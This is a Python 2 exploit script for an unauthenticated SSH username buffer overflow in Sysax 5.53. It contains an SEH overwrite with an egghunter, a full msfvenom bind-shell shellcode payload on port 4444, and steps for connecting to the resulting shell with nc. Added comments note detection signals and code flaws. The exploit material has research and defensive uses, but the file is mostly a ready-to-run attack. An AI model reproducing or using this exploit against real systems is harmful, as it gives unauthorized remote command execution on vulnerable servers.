#!/usr/bin/python
#
# October 2017 | github.com/rafaveira3
#
# Exploit Sysax 5.53 - SSH 'Username' Buffer Overflow Unauthenticated (Using Egghunter)
#
# How I tested it:
# - Windows XP SP3 and Kali.
# - Download the vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE)
# - https://www.exploit-db.com/apps/bac43012f5bd4d3092c1153b52ed3301-sysaxserv_setup5.53.msi
#
# PoC:
# Windows XP:
# - Install Sysax 5.53 (next -> next -> finish)
# - Setup SSH service: "Manage Server Settings -> Configure -> Check first box"
# - Open cmd.exe and type : netstat -ano | find ":4444"
# Kali:
# root@kali:~# pip install paramiko
# root@kali:~# nc -nv 10.10.0.20 4444
# (UNKNOWN) [10.10.0.20] 4444 (?) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\WINDOWS\system32>
#
#
# Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems.
# Accessing a computer system or network without authorization or explicit permission is illegal.
#
# Infos:
# - pattern_create + pattern_offset = 9208
# - pop pop ret found using mona at 0x5d9227fc of RPCNS4.dll (SafeSEH: False)
# - jmp back 128 bytes = \xEB\x80
# - egghunter generated with mona (egg r4f4)
# - shellcode generated with msfvenom
import paramiko,os,sys
# Lab target as written by the author (host/port of the test VM from the header).
host = "10.10.0.20"
port = 22
# Size 32 Bytes
# Egg = r4f4
# Egghunter stub from the header (generated with mona, egg tag "r4f4"); it is
# placed in `buff` below between two NOP sleds.
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
# msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f python -e x86/alpha_mixed
# Size = 718 bytes
# Defender note: per the msfvenom line above and the netstat/nc steps in the
# header, a successful run leaves a bind listener on TCP 4444 on the target;
# that port opening on the server is the network-level indicator of this payload.
shellcode = ""
shellcode += "\x89\xe7\xdb\xc9\xd9\x77\xf4\x5f\x57\x59\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
shellcode += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
shellcode += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
shellcode += "\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x38\x68\x6f"
shellcode += "\x72\x77\x70\x53\x30\x67\x70\x71\x70\x6c\x49\x39\x75"
shellcode += "\x54\x71\x4b\x70\x35\x34\x4c\x4b\x76\x30\x74\x70\x4e"
shellcode += "\x6b\x43\x62\x36\x6c\x4e\x6b\x63\x62\x62\x34\x6c\x4b"
shellcode += "\x51\x62\x57\x58\x36\x6f\x6c\x77\x32\x6a\x76\x46\x55"
shellcode += "\x61\x6b\x4f\x6c\x6c\x45\x6c\x50\x61\x53\x4c\x44\x42"
shellcode += "\x66\x4c\x45\x70\x6a\x61\x48\x4f\x34\x4d\x56\x61\x59"
shellcode += "\x57\x58\x62\x6a\x52\x42\x72\x52\x77\x4e\x6b\x46\x32"
shellcode += "\x62\x30\x6e\x6b\x32\x6a\x65\x6c\x6c\x4b\x32\x6c\x52"
shellcode += "\x31\x44\x38\x4b\x53\x70\x48\x56\x61\x48\x51\x46\x31"
shellcode += "\x4c\x4b\x56\x39\x67\x50\x37\x71\x4b\x63\x4c\x4b\x53"
shellcode += "\x79\x72\x38\x4d\x33\x34\x7a\x62\x69\x6c\x4b\x36\x54"
shellcode += "\x6e\x6b\x73\x31\x5a\x76\x55\x61\x4b\x4f\x6e\x4c\x6b"
shellcode += "\x71\x6a\x6f\x64\x4d\x47\x71\x58\x47\x45\x68\x69\x70"
shellcode += "\x51\x65\x4c\x36\x56\x63\x51\x6d\x39\x68\x57\x4b\x51"
shellcode += "\x6d\x37\x54\x74\x35\x59\x74\x31\x48\x6e\x6b\x76\x38"
shellcode += "\x67\x54\x37\x71\x4e\x33\x65\x36\x4e\x6b\x54\x4c\x52"
shellcode += "\x6b\x4e\x6b\x32\x78\x37\x6c\x45\x51\x49\x43\x6e\x6b"
shellcode += "\x54\x44\x4e\x6b\x43\x31\x58\x50\x6e\x69\x31\x54\x66"
shellcode += "\x44\x54\x64\x53\x6b\x33\x6b\x43\x51\x50\x59\x42\x7a"
shellcode += "\x33\x61\x79\x6f\x59\x70\x71\x4f\x61\x4f\x51\x4a\x4c"
shellcode += "\x4b\x42\x32\x68\x6b\x6e\x6d\x43\x6d\x55\x38\x30\x33"
shellcode += "\x30\x32\x35\x50\x73\x30\x52\x48\x70\x77\x73\x43\x36"
shellcode += "\x52\x33\x6f\x51\x44\x50\x68\x70\x4c\x34\x37\x64\x66"
shellcode += "\x36\x67\x4b\x4f\x39\x45\x4d\x68\x7a\x30\x56\x61\x63"
shellcode += "\x30\x57\x70\x56\x49\x6a\x64\x72\x74\x56\x30\x65\x38"
shellcode += "\x47\x59\x4f\x70\x70\x6b\x63\x30\x4b\x4f\x4a\x75\x73"
shellcode += "\x5a\x54\x48\x61\x49\x30\x50\x79\x72\x4b\x4d\x43\x70"
shellcode += "\x56\x30\x51\x50\x36\x30\x72\x48\x49\x7a\x34\x4f\x49"
shellcode += "\x4f\x69\x70\x49\x6f\x78\x55\x6a\x37\x75\x38\x75\x52"
shellcode += "\x37\x70\x52\x31\x73\x6c\x6d\x59\x69\x76\x71\x7a\x36"
shellcode += "\x70\x30\x56\x72\x77\x61\x78\x48\x42\x6b\x6b\x64\x77"
shellcode += "\x63\x57\x49\x6f\x69\x45\x50\x57\x70\x68\x4d\x67\x4a"
shellcode += "\x49\x54\x78\x4b\x4f\x4b\x4f\x4e\x35\x50\x57\x71\x78"
shellcode += "\x42\x54\x6a\x4c\x35\x6b\x59\x71\x39\x6f\x4b\x65\x43"
shellcode += "\x67\x6c\x57\x70\x68\x31\x65\x52\x4e\x72\x6d\x45\x31"
shellcode += "\x39\x6f\x4e\x35\x63\x58\x65\x33\x72\x4d\x32\x44\x53"
shellcode += "\x30\x6e\x69\x6a\x43\x72\x77\x61\x47\x56\x37\x34\x71"
shellcode += "\x4c\x36\x32\x4a\x52\x32\x46\x39\x70\x56\x79\x72\x69"
shellcode += "\x6d\x61\x76\x4a\x67\x53\x74\x54\x64\x37\x4c\x45\x51"
shellcode += "\x66\x61\x4c\x4d\x32\x64\x66\x44\x66\x70\x59\x56\x35"
shellcode += "\x50\x77\x34\x31\x44\x76\x30\x36\x36\x63\x66\x66\x36"
shellcode += "\x37\x36\x42\x76\x42\x6e\x56\x36\x76\x36\x51\x43\x42"
shellcode += "\x76\x52\x48\x64\x39\x48\x4c\x77\x4f\x6c\x46\x49\x6f"
shellcode += "\x78\x55\x4e\x69\x6d\x30\x70\x4e\x50\x56\x67\x36\x39"
shellcode += "\x6f\x70\x30\x62\x48\x35\x58\x4d\x57\x57\x6d\x35\x30"
shellcode += "\x69\x6f\x58\x55\x6f\x4b\x48\x70\x6d\x65\x6d\x72\x31"
shellcode += "\x46\x51\x78\x6d\x76\x4d\x45\x4f\x4d\x4d\x4d\x49\x6f"
shellcode += "\x5a\x75\x55\x6c\x67\x76\x71\x6c\x34\x4a\x4b\x30\x6b"
shellcode += "\x4b\x39\x70\x50\x75\x65\x55\x6f\x4b\x57\x37\x54\x53"
shellcode += "\x71\x62\x32\x4f\x71\x7a\x55\x50\x31\x43\x4b\x4f\x39"
shellcode += "\x45\x41\x41"
# The oversized SSH 'username' value. Layout follows the header notes: filler,
# NOP sled, egghunter, NOP sled, the SEH pieces (jmp-back \xEB\x80 and the
# pop/pop/ret 0x5d9227fc written little-endian), the egg tag, then shellcode.
# Defender note: the whole field is close to 10,000 bytes (8972 + 150 + 32 +
# 50 + 2 + 2 + 4 + 8 + 718), orders of magnitude longer than any legitimate
# username; a length bound on the userauth username, or an IDS match on an
# SSH username of that size, is the simplest detection signal for this bug.
buff = "A"*8972 + "\x90"*150 + egghunter + "\x90"*50 + "B"*2 + "\xEB\x80" + "\xFC\x27\x92\x5d" + "r4f4r4f4" + shellcode
# NOTE: Python 2 print statements throughout; this file does not parse under Python 3.
print "[+] Launching exploit..."
try:
    transport = paramiko.Transport((host, port))
except:
    # NOTE(review): bare except also swallows KeyboardInterrupt/SystemExit;
    # the connect-failure message below is printed for any exception type.
    print "[X] Unable to connect to " + host + " on port " + str(port)
    sys.exit(1)
# NOTE(review): the Transport opened in the try block above is never closed;
# it is simply replaced by this second one, which is the only one used.
transport = paramiko.Transport((host, port))
# The overflow is reached through the userauth 'username' field, which per the
# header title is processed before any credential is checked ("Unauthenticated").
transport.connect(username = buff, password = "rafael")
transport.close()
print "[+] Done!"